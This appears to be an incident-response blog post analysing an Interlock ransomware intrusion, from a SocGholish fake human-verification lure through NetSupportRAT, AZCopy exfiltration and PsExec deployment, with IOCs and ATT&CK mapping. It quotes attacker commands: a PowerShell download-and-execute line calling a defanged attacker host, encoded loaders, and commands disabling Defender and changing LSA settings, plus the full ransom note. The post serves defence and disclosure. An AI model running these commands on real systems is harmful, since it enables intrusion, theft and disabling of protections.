Interlock Intrusion: How Interlock Achieves Encryption

Background

Organizations often call on GuidePoint Security analysts to support and consult on Digital Forensics and Incident Response (DFIR) efforts, focusing on remediation, recovery, and forensic analysis of ransomware events. In one such event, the victim called in GuidePoint Security’s DFIR team to investigate a ransomware event involving a ransomware group known as “Interlock.” Interlock used a compromised legitimate website to deploy SocGholish malware, providing the attacker with a backdoor to the target network, which the attacker leveraged to deploy NetSupportRAT, establishing persistent access. With persistent access achieved, the threat actor (TA) performed reconnaissance on the network, hijacked an active M365 session to gain further access to tools and data, and then exfiltrated sensitive data via AZCopy (an Azure data management tool) to an attacker-controlled Azure Cloud Storage Blob. Following data exfiltration, the TA likely used PSExec to push the Interlock encryptor throughout the network, leading to widespread encryption.

Case Study

The first indications of the attack were widespread loss of employee access to the organization’s M365 tenant, followed by observation of ransomware deployment across the network. This was a direct result of the TA initiating a mass password reset on the Active Directory server. Because the Active Directory server was synced with the M365 tenant, it led to widespread loss of access; however, later-stage encryption made clear the wider extent of the intrusion at hand.

The following infection chain showcases social engineering leading a victim to a compromised website, which hosted a PHP script displaying a seemingly authentic human verification check.  When the victim clicked the “I’m not a robot” button, an additional JavaScript payload was downloaded onto the victim’s endpoint, granting the TA initial access upon execution. When the victim attempted to verify that they were human, it’s likely that the JavaScript injected a malicious command into the user’s clipboard and prompted them to run the command using the Run dialog.

During the victim’s normal daily routine, the user legitimately searched for and browsed to the website `hxxps[://]talentohc[.]com/`, which likely provided a user verification pop-up. The compromised website and subsequent human verification pop-up redirected the user to the compromised landing page of `telback[.]com/js.php` and subsequently the URI `telback[.]com/5t5y.js`. This malicious .js file led to the download of malware from the SocGholish staging page `hXXp://emildeeeabebggm[.]top/1.php`. SocGholish, also known as “FakeUpdates,” is a well-known malware used by attackers to trick victims into performing specific actions, such as downloading an illegitimate update or “verifying human,” which leads to a drive-by compromise of the end user’s device. It ultimately uses social engineering tactics like phishing or search engine optimization poisoning to gain access to systems.

A user on the Infosec Exchange Mastodon server identified this as a SocGholish compromised domain used to distribute the malware to unwitting victims. The user downloaded the SocGholish payload and subsequently executed the following defanged payload, likely without the user’s knowledge of the potential impact:

HostApplication=powershell -NoProfile -Command $r=iwr 'hxxps[://]diff-beats-belize-chapter.trycloudflare[.]com/12341234' -UseBasicParsing;$s=[Text.Encoding]::UTF8.GetString($r.Content);iex $s

This PowerShell command created the directory `C:\Users\redacted\AppData\Roaming\node-v22.11.0-win-x64` and led to the download and execution of `C:\Users\redacted\AppData\Roaming\node-v22.11.0-win-x64\node.exe` in order to establish an HTTP tunnel, utilizing the NodeJS environment, supporting second and third stage payload delivery and installation on the victim device. NodeJS is a popular JavaScript runtime networking utility that facilitates data transfer over HTTP from one client to another through a server intermediary, allowing data transfer that bypasses network-level visibility. A log file containing C2 hostnames and IP addresses was later discovered within this directory at the file path `C:\Users\redacted\AppData\Roaming\node-v22.11.0-win-x64\mlvgyNAn.log`.
Below are the mlvgyNAn.log file contents:

const hosts = [
'zoloft-indianapolis-riders-convinced[.]trycloudflare[.]com', 'bidder-horizontal-wildlife-invoice[.]trycloudflare[.]com', 'name-kw-papua-booking[.]trycloudflare[.]com', 'bristol-weed-martin-know[.]trycloudflare[.]com', 'musicians-forestry-operation-angels[.]trycloudflare[.]com', 'peter-secrets-diana-yukon[.]trycloudflare[.]com' ]; const hostsIp = [ '23[.]227[.]203[.]162', '65[.]109[.]226[.]176', '65[.]38[.]120[.]47' ];

The connection from the tunnel to C2 resulted in the installation of two backdoors in the form of .DLL files, leading to the installation of NetSupportRAT. NetSupportRAT is a remote access trojan (RAT) created initially by NetSupport Inc., as “NetSupport Manager” to function as a legitimate remote administration tool. It has since been co-opted maliciously to allow an attacker to gain control over a victim’s computer from a remote location. The primary purpose of the NetSupportRAT in this instance is to provide remote access and control over a compromised device, allowing the attacker to perform various malicious actions. The RAT was installed via the following Base64-encoded PowerShell Command:

HostApplication=C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -noprof -eXECUTionpolIC BYPaSs -wINDOWsT H -eNc JAByAGsAaABLAHMAPQAnAGgAdAB0AHAAcwA6AC8ALwBhAG4AZAByAGkAeABkAGUAcwBpAGcAbgAuAGMAbwBtAC8AawB6AHoALwBjADQAdQBiAC4AegBpAHAAJwA7ACAAJAByADQAaQAwA.....[TRUNCATED]

The PowerShell execution delivers malware via a ZIP archive file that is then extracted onto the victim’s system. Specifically, the decoded Base64 ultimately uses BITSAdmin to download the NetSupportRAT from the following URLs `hxxps[://]andrixdesign[.]com/kzz/c1ub.zip` and `hxxps[://]andrixdesign[.]com/kzf/`.

This ZIP archive file is extracted to reveal the NetSupportRAT executable (`remcmdstub.exe`) with supporting files, sets a registry RUN Key as `HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\client32.exe`, and results in the creation of a directory named 0nenote, misspelled with the number ‘0’ instead of the letter ‘O’. The full directory after the extraction and installation of the RAT included the following files:

C:\Users\redacted\AppData\Roaming\0neNote\PCICL32.DLL
C:\Users\redacted\AppData\Roaming\0neNote\kbd106n.dll
C:\Users\redacted\AppData\Roaming\0neNote\security.dll
C:\Users\redacted\AppData\Roaming\0neNote\remcmdstub.exe
C:\Users\redacted\AppData\Roaming\0neNote\AudioCapture.dll
C:\Users\redacted\AppData\Roaming\0neNote\wmi.dll
C:\Users\redacted\AppData\Roaming\0neNote\PCICHEK.DLL
C:\Users\redacted\AppData\Roaming\0neNote\DMAlertListener.ProxyStub.dll
C:\Users\redacted\AppData\Roaming\0neNote\normaliz.dll
C:\Users\redacted\AppData\Roaming\0neNote\KBDBENE.DLL
C:\Users\redacted\AppData\Roaming\0neNote\KBDCA.DLL
C:\Users\redacted\AppData\Roaming\0neNote\msidntld.dll

The TA then pivoted from establishing persistence to performing reconnaissance of the network. They downloaded a commonly used port scanner (`advanced_port_scanner.exe`) to the system and began enumerating network directories. During this process, the TA also attempted to brute force password resets, likely to gain elevated privileges, before clearing terminal history.

The TA eventually gained access to an administrator account and then began to conduct further reconnaissance by identifying network locations and data stores. Finally, the TA pivoted to the organization’s Exchange server, ultimately leading to the compromise of a Hyper-V instance. After a week-long break in observed activity, the TA attempted to remove administrator privilege requirements in various directories via the following PowerShell command:

C:\Windows\System32\cmd.exe /Q /c echo powershell.exe -noni -nop -w 1 -enc IABOAGUAdwAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAAIgBIAEsATABNADoAXABTAHkAcwB0AGUAbQBcAEMAdQByAHIAZQBuAHQAQwBvAG4AdAByAG8AbABTAGUAdABcAEMAbwBuAHQAcgBvAGwAXABMAHMAYQAiACAALQBOAGEAbQBlACAAIgBEAGkAcwBhAGIAbABlAFIAZQBzAHQAcgBpAGMAdABlAGQAQQBkAG0AaQBuACIAIAAtAFYAYQBsAHUAZQAgACIAMAAiACAALQBQAHIAbwBwAGUAcgB0AHkAVAB5AHAAZQAgAEQAVwBPAFIARAAgAC0ARgBvAHIAYwBlAA==

The decoded Base64 in this command equates to `New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name "DisableRestrictedAdmin" -Value "0" -PropertyType DWORD -Force`:
This command creates a new property in the registry at the specific location of `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa`. This is a subkey under the root key (`HKEY_LOCAL_MACHINEv) in the `SYSTEM` for the Local Signature Authority (LSA), “which includes the Local Security Authority Server Service (LSASS) process, and is used to validate users for local and remote sign-ins in addition to enforcing local security policies” according to Microsoft. The command then sets the name of the property `DisableRestrictedAdmin` to 0, which disables the property, enabling Restricted Admin Mode. According to a report by AON, this could allow one of two things: bypass MFA requirements for RDP solutions or enable the TA to trivially dump LSASS credentials in memory. By now, the TA has hijacked an ongoing M365 session and managed to secure an administrator’s account credentials in LastPass—a goldmine of access in most organizations—and proceeded to log in to services used by the company. The TA then downloaded a renamed copy of AZCopy, a legitimate tool for moving data between and to Azure storage accounts, as `C:\Users\redacted\AppData\Local\Temp\5\conhost.exe` and began to exfiltrate data through an Azure instance using the following details:
System.Provider.Name –
`C:\Users\\[redacted]\AppData\Local\Temp\5\conhost.exe
base_url – hxxps://azureapp.blob[.]core.windows.net
user_agent – AzCopy/10.27.0 azsdk-go-azblob/v1.4.0 (go1.23.1; Windows_NT)`

According to Microsoft:

“AZCopy is a command-line utility provided by Microsoft that can be used to copy data to, from, or between Azure storage accounts. Common use cases include:

• Copying data from an on-premises source to an Azure storage account
• Copying data from an Azure storage account to an on-premises source
• Copying data from one storage account to another storage account”

In this instance, the TA used this method to copy files from on-premises devices to an Azure Storage blob and likely later transferred the data from the Azure Storage to their own infrastructure. This is of particular note because it follows an increasing trend of ransomware operators using cloud utilities such as `rclone` and `AZCopy` to bulk transfer data from on-premises devices to cloud storage, whether as an intermediary or final destination. Additionally, `AZCopyv allows users to quickly transfer large amounts of structured and unstructured data, making it an efficient tool for attackers to abuse. At the time of this blog, open-source reporting has linked the use of `AZCopy` to ransomware gangs BianLian and Rhysida.

Leveraging the stolen administrative credentials, the TA next installed AnyDesk, another remote access tool with legitimate use cases, under the path `C:\ProgramData\AnyDesk\AnyDesk.exe` on a Domain Controller. AnyDesk is a popular remote desktop application that allows users to access and control a computer or other device (like a smartphone or tablet) from a different location. It is particularly known for its speed and low latency, making remote sessions feel responsive. After installing AnyDesk and while logging into services via LastPass, the TA used the command `Set-MpPreference -DisableRealtimeMonitoring $true` to configure Windows Defender preferences to disable real-time protection on the system. The TA subsequently used `New-ItemProperty -Path ""HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender"" -Name DisableAntiSpyware -Value 1 -PropertyType DWORD –Force` to completely disable Microsoft Defender on the device.

The TA used a combination of the AnyDesk Remote Monitoring and Management (RMM) tool and `PSExec` to move copies of the Interlock ransomware binary `C:\Temp\rsyncA.exe` to other devices on the network at the directory location `C:\Users\redacted\AppData\Local\Temp\rsyncA.exe`. `PSExec` is a lightweight tool that is part of the Microsoft Sysinternals Suite, a set of system administration utilities developed by Microsoft. Its primary function is to execute processes (programs) on remote Windows systems and allows IT professionals to run commands and applications on other computers on a network as if they were sitting right in front of them. The TA then created a Group Policy Object entitled `123`, which was potentially used to execute the binary on all domain-joined systems. Execution of the ransomware binary resulted in the encryption of non-system files, the addition of the `*.1nt3rlock` file extension, and the generation of ransom notes in impacted directories.

Ransom Note

The following is a ransom note received from TA Interlock:

We have successfully breached your network, encrypted your files, and obtained highly sensitive data. This is the result of weak cybersecurity on your part. As of now, your access to critical business information has been revoked. The only way to regain control is through cooperation. If you fail to contact us within 72 hours, we will proceed to publish your data to the public, ensuring severe consequences for your organization. By not addressing this matter, you risk violating major laws such as GDPR, GLBA, HIPAA, CCPA, NYDFS Cybersecurity Regulation, and DPA 2018. Such violations can result in massive fines, lawsuits, and irreparable harm to your reputation. It is your organization`s responsibility to protect Non-Public Information (NPI); neglecting this duty has led to this situation.

To resolve this issue, visit our secure negotiation portal using the TOR Browser. Download TOR from [https://www.torproject.org](https://www.torproject.org), and access http://[redacted].onion/chat.php. Use your Organization ID [redacted] to initiate communication. If you prefer, you can also use standard browsers like Chrome, Edge, or Firefox and go to http://[redacted].onion.ly/chat.php, where your ID will allow you to proceed. Do not attempt to recover files on your own or involve third parties, as these actions will void the opportunity to resolve this matter and could lead to permanent data loss. Failure to act will escalate the situation, exposing your data to competitors, regulators, and the media. Your future depends on your decision now-act responsibly before the deadline passes.

Diamond Model Mapping

MITRE ATT&CK Mapping

Technique	Tool/Activity	ATT&CK ID	Details
Drive-by Compromise	SocGholish	T1189	SocGholish uses malicious JavaScript to exploit users via compromised websites.
Spearphishing via Service	SocGholish	T1566.003	Delivered through deceptive web pop-ups
Command and Scripting Interpreter: PowerShell	PowerShell for NetSupportRAT	T1059.001	PowerShell used to download, decode, and execute payloads.
User Execution	SocGholish dropper	T1204.002	Requires user interaction (click or fake update) to initiate infection.
Application Layer Protocol: Web Protocols	NetSupportRAT	T1071.001	HTTP/HTTPS used for beaconing and C2.
Remote Access Software	NetSupportRAT, AnyDesk	T1219	Legitimate remote tools abused for control.
Network Service Scanning	Advanced IP Scanner	T1046	Used to enumerate active devices and services.
System Information Discovery	Built-in commands	T1082	TA likely used basic recon (hostname, users, OS info).
Remote Services: Remote Desktop Protocol (RDP)	RDP to DC/Exchange/Hyper-V	T1021.001	Used for lateral access across systems.
Remote Services: PsExec	PsExec for payload distribution	T1021.002	Common for ransomware delivery post-compromise.
Credentials from Password Stores	LastPass credential theft	T1555.001	Targeting password vaults for corporate credentials.
Credential Dumping	(If used after access)	T1003	May follow for harvesting from LSASS or SAM.
Exfiltration Over Alternative Protocol	AZCopy as conhost.exe	T1048.002	AZCopy used with cloud storage endpoints.
Data Encrypted for Impact	Ransomware (rsyncA.exe)	T1486	Final stage – files encrypted to extort payment.

Conclusion

Interlock is an Emerging** ransomware group that has quickly adopted a diverse range of tactics, based on open-source reporting. The use of `AZCopy` to exfiltrate data via Azure Blobs is not novel but is somewhat uncommon. Additionally, the use of SocGholish leading directly to ransomware is less common, as the malware’s methods are more commonly used for information-stealing malware deployment. The “Human Verification” social engineering element is not a tactic we have observed in relation to ransomware deployments prior to this incident.

Organizations should strongly consider developing and regularly rehearsing their incident response plans, creating a thorough asset inventory, and engaging in attack surface reduction efforts. Proactive threat hunts within their environments are also beneficial in ensuring an effective security posture of an organization. Finally, endpoint security monitoring efforts are most effective when all endpoints (servers and workstations) are included in the monitoring; unmonitored or “shadow IT” devices serve as an ideal entry point for attackers seeking to overcome otherwise secure defenses.

** An explanation of GRIT’s ransomware taxonomy can be found at the end of this post.

Technical Details

Network IOCs:

hxxps[://]andrixdesign[.]com/kzz/c1ub.zip
hxxps[://]diff-beats-belize-chapter.trycloudflare[.]com/12341234
zoloft-indianapolis-riders-convinced[.]trycloudflare[.]com
bidder-horizontal-wildlife-invoice[.]trycloudflare[.]com
name-kw-papua-booking[.]trycloudflare[.]com
bristol-weed-martin-know[.]trycloudflare[.]com
musicians-forestry-operation-angels[.]trycloudflare[.]com
peter-secrets-diana-yukon[.]trycloudflare[.]com
23[.]227[.]203[.]162
65[.]109[.]226[.]176
65[.]38[.]120[.]47
telback[.]com/5t5y.js

Host IOCs:

C:\Users\redacted\AppData\Roaming\0neNote\client32.exe
C:\Windows\Temp\jdk.exe
DESKTOP-M53I0B5
C:\Users\redacted\AppData\Roaming\0ne Note\client32.exe
C:\windows\temp\jar.jar
C:\Windows\Temp\jdk.exe
C:\Windows\System32\Tasks\System
C:\Windows\System32\Tasks\Microsoft\Windows\Chkdsk\ProactiveScan
C:\Users\redacted\AppData\Local\Temp\1\ouj.jar
C:\Users\redacted\AppData\Local\Temp\1\client32.dll
C:\Temp\client32.dll
C:\Temp\rsyncA.exe
C:\Users\redacted\AppData\Local\Temp\rsyncA.exe
C:\Users\redacted\AppData\Local\Temp\5\conhost.exe
C:\Users\redacted\AppData\Local\Temp\6\svchost.dll
C:\temp\client32.dll
C:\Users\redacted\AppData\Roaming\node-v22.11.0-win-x64\node.exe
C.\Users\redacted\AppData\Roaming\x7oo83rn\lyp3ykgc.dll
C:\Users\redacted\AppData\Roaming\lnnbf4ro\bjzz1ozg.dll
C:\Users\redacted\AppData\Roaming\0neNote\PCICL32.DLL
C:\Users\redacted\AppData\Roaming\0neNote\kbd106n.dll
C:\Users\redacted\AppData\Roaming\0neNote\security.dll
C:\Users\redacted\AppData\Roaming\0neNote\remcmdstub.exe
C:\Users\redacted\AppData\Roaming\0neNote\AudioCapture.dll
C:\Users\redacted\AppData\Roaming\0neNote\wmi.dll
C:\Users\redacted\AppData\Roaming\0neNote\PCICHEK.DLL
C:\Users\redacted\AppData\Roaming\0neNote\DMAlertListener.ProxyStub.dll
C:\Users\redacted\AppData\Roaming\0neNote\normaliz.dll
C:\Users\redacted\AppData\Roaming\0neNote\KBDBENE.DLL
C:\Users\redacted\AppData\Roaming\0neNote\KBDCA.DLL
C:\Users\redacted\AppData\Roaming\0neNote\msidntld.dll